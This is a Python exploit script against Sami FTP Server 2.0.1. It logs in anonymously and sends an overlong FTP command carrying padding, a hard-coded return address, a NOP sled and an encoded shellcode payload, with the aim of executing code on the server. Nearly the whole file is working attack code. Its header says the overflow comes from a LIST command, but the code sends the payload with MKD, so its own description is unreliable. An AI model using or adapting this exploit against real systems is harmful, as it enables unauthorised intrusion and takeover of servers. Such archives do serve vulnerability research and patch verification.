#!/usr/bin/env python
#-*- coding:utf-8 -*-

# Exploit Title: Sami FTP LIST buffer overflow
# Date: 27 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Pro SP1, English
#            Windows XP Pro SP2, English
#
# Description: 
# A buffer overflow is triggered when a long LIST command is sent to the 
# server and the user views the Log tab. 
#

from socket import *
import struct, sys

IP = sys.argv[1]
shell_code = ("\xb8\xa2\xde\x67\x36\xda\xdf\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"+
"\x56\x31\x43\x13\x83\xc3\x04\x03\x43\xad\x3c\x92\xca\x59\x49"+
"\x5d\x33\x99\x2a\xd7\xd6\xa8\x78\x83\x93\x98\x4c\xc7\xf6\x10"+
"\x26\x85\xe2\xa3\x4a\x02\x04\x04\xe0\x74\x2b\x95\xc4\xb8\xe7"+
"\x55\x46\x45\xfa\x89\xa8\x74\x35\xdc\xa9\xb1\x28\x2e\xfb\x6a"+
"\x26\x9c\xec\x1f\x7a\x1c\x0c\xf0\xf0\x1c\x76\x75\xc6\xe8\xcc"+
"\x74\x17\x40\x5a\x3e\x8f\xeb\x04\x9f\xae\x38\x57\xe3\xf9\x35"+
"\xac\x97\xfb\x9f\xfc\x58\xca\xdf\x53\x67\xe2\xd2\xaa\xaf\xc5"+
"\x0c\xd9\xdb\x35\xb1\xda\x1f\x47\x6d\x6e\x82\xef\xe6\xc8\x66"+
"\x11\x2b\x8e\xed\x1d\x80\xc4\xaa\x01\x17\x08\xc1\x3e\x9c\xaf"+
"\x06\xb7\xe6\x8b\x82\x93\xbd\xb2\x93\x79\x10\xca\xc4\x26\xcd"+
"\x6e\x8e\xc5\x1a\x08\xcd\x81\xef\x27\xee\x51\x67\x3f\x9d\x63"+
"\x28\xeb\x09\xc8\xa1\x35\xcd\x2f\x98\x82\x41\xce\x22\xf3\x48"+
"\x15\x76\xa3\xe2\xbc\xf6\x28\xf3\x41\x23\xfe\xa3\xed\x9b\xbf"+
"\x13\x4e\x4b\x28\x7e\x41\xb4\x48\x81\x8b\xc3\x4e\x4f\xef\x80"+
"\x38\xb2\x0f\x27\x02\x3b\xe9\x4d\x64\x6a\xa1\xf9\x46\x49\x7a"+
"\x9e\xb9\xbb\xd6\x37\x2e\xf3\x30\x8f\x51\x04\x17\xbc\xfe\xac"+
"\xf0\x36\xed\x68\xe0\x49\x38\xd9\x6b\x72\xab\x93\x05\x31\x4d"+
"\xa3\x0f\xa1\xee\x36\xd4\x31\x78\x2b\x43\x66\x2d\x9d\x9a\xe2"+
"\xc3\x84\x34\x10\x1e\x50\x7e\x90\xc5\xa1\x81\x19\x8b\x9e\xa5"+
"\x09\x55\x1e\xe2\x7d\x09\x49\xbc\x2b\xef\x23\x0e\x85\xb9\x98"+
"\xd8\x41\x3f\xd3\xda\x17\x40\x3e\xad\xf7\xf1\x97\xe8\x08\x3d"+
"\x70\xfd\x71\x23\xe0\x02\xa8\xe7\x10\x49\xf0\x4e\xb9\x14\x61"+
"\xd3\xa4\xa6\x5c\x10\xd1\x24\x54\xe9\x26\x34\x1d\xec\x63\xf2"+
"\xce\x9c\xfc\x97\xf0\x33\xfc\xbd")

buffer = "\x90" * 20 + shell_code
buf = "A" * 247 + "\x65\x82\xa5\x7c" + buffer + "C" * (749 - len(buffer)) 

#Conexção ao servidor de FTP
s = socket(AF_INET, SOCK_STREAM)
s.connect((IP,21))
s.recv(1024)

s.send("USER anonymous\r\n")
s.recv(1024)

s.send("PASS a@a\r\n")
s.recv(1024)

s.send('MKD ' + buf + '\r\n')
s.recv(1024)

s.close()

